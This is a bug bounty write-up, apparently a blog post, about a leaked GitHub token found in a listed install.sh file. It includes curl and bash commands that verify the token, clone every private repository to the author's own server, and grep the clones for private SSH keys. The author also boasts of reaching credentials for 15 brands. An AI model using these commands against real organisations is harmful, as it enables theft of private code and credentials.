Full structure takeover to many brands of company

Notic: this private program is hosted on bugcrowd platform and have many brands

While testing this program I made a brute-force directories and found this directory listing http://sub.target.com/scripts

Directory listing

While analysing this files I have found interested token in [install.sh] file

This is Github access token, [d42e9078e94930************] , but first I want to verify this token valid or expired , because when developer create this token can choose time to expired it automatically like this ..

Automatically expire after 30 days

Lets try to verify

https://api.github.com/orgs/<username>/repos?access_token=<token>

You should request like this URL by browser or curl, and then matches the response repositories or it was expired ..

Access token is valid

Amazing!! I can list private clone repositories, But I can’t report it without make sure that data related to company or not, because maybe this developer just work part-time in company, so I will clone private repositories and analysis it, lets goo

curl https://api.github.com/orgs/<username>/repos?access_token=<token> | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txt
for repo in $(cat privare_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done

This bash code to clone all private repositories at my VPS and then go to analysis it

5.4G size of all repositories

I have found 5.4G size of repositories OMG..

5.4G !!!!!!

I can’t analysis this size of data in short time, so I will use grep command to get sensitive data

# Grep private ssh key command
grep -r -R '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))'

This regex to extract private ssh key from all repositories , very nice

docker-compose.yml creds

This file I have found many of creds and I have found many of docker connections but I cant make this because its out of scope from program, because the program say that not to try connect databases or internal structure

But I have larger than 15 private repository related to 15 brand :)

I found at every repo [ panel passwords , backup databases , full application code , cloud creds] and I can connect and takeover all brands

Also Business impact

I reached to all [product architecture , products layout] but sorry I cant share this, to preserve the confidentiality of company data

Keep following

Linkedin | Facebook

I will publish some juicy writeups soon ..